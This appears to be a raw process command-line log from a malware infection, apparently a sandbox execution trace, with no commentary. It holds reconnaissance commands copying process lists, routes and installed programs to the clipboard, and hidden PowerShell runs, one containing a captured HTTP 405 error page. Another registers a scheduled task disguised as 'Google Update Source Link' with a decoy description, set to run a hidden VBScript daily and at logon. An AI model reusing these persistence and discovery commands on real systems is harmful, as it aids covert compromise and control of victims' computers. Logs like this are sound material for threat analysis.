"C:\Windows\System32\cmd.exe" /c tasklist /v | clip

"C:\Windows\System32\cmd.exe" /c Route print | clip

"C:\Windows\System32\cmd.exe" /c dir /w "C:\Windows/../Program Files" | clip

"C:\Windows\System32\cmd.exe" /c dir /w "C:\Windows/../Program Files (x86)" | clip

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden C:\Users\Admin\AppData\Local\Temp\2022.hwp

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden <table width="730" border="0" cellspacing="0" cellpadding="0"> <!-- Error title --> <tbody><tr> <td width="60" align="left" id="infoIconAlign" valign="top" rowspan="2"> <img id="infoIcon" alt="Info icon" src="info_48.png"> </td> <td width="*" align="left" id="mainTitleAlign" valign="middle"> <h1 id="mainTitle">The website cannot display the page</h1> </td> </tr> <tr> <!-- This row is for HTTP status code, as well as the divider--> <td align="right" class="errorCodeAndDivider" id="http405Align"><id id="http405"> HTTP 405</id> <div class="divider"></div> </td> </tr> <!-- Error Body --> <tr> <td> </td> <td align="left" id="mostlikelyAlign" valign="top"> <h3><id id="mostlikely">Most likely cause:</id></h3> <ul> <li><id id="programerror">The website has a programming error.</id></li> </ul> </td> </tr> <!-- What you can do --> <tr> <td> </td> <td align="left" id="whatToTryAlign" valign="top"> <h2 id="whatToTry">What you can try:</h2> </td> </tr> <!-- back to previous page --> <tr> <td> </td> <td align="left" id="goBackAlign" valign="middle"> <h4> <table> <tbody><tr> <td valign="top"> <img class="actionIcon" alt="" src="bullet.png" border="0"> </td> <td valign="top"> <span id="goBackContainer"><a href="javascript:history.back();">Go back to the previous page.</a></span><noscript id="goBack">Go back to the previous page.</noscript> </td> </tr> </tbody></table> </h4> </td> </tr> <!-- InfoBlock --> <tr> <td align="right" id="infoBlockAlign" valign="top"> </td> <td align="left" id="moreInfoAlign" valign="middle"> <h4> <table> <tbody><tr> <td valign="top"> <a onclick="javascript:expandCollapse('infoBlockID', true); return false;" href="#"><img class="actionIcon" id="infoBlockIDImage" alt="More information" src="down.png" border="0"></a> </td> <td valign="top"> <span id="moreInfoContainer"><a href="javascript:expandCollapse('infoBlockID', true);">More information</a></span> <noscript><ID id="moreInformation">More information</ID></noscript> </td> </tr> </tbody></table> </h4> <div class="infoBlock" id="infoBlockID" style="display: none;"> <p id="errorExplanation">This error (HTTP 405 Method Not Allowed) means that Internet Explorer was able to connect to the website, but the site has a programming error.</p> <p id="moreInfoSeeHelp">For more information about HTTP errors, see Help.</p> </div> </td> </tr> </tbody></table>

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden $a = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\mscornet.vbs';$t1 = New-ScheduledTaskTrigger -Daily -At 10AM;$t2 = New-ScheduledTaskTrigger -Daily -At 11AM;$t3 = New-ScheduledTaskTrigger -Daily -At 3PM;$t4 = New-ScheduledTaskTrigger -Daily -At 4PM;$t5 = New-ScheduledTaskTrigger -Daily -At 5PM;$t6 = New-ScheduledTaskTrigger -AtLogOn;$d = 'Export the 10 newest events in the application logs';Register-ScheduledTask -Action $a -TaskName 'Google Update Source Link' -Trigger $t1,$t2,$t3,$t4,$t5,$t6 -Description $d;

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:17410 /prefetch:2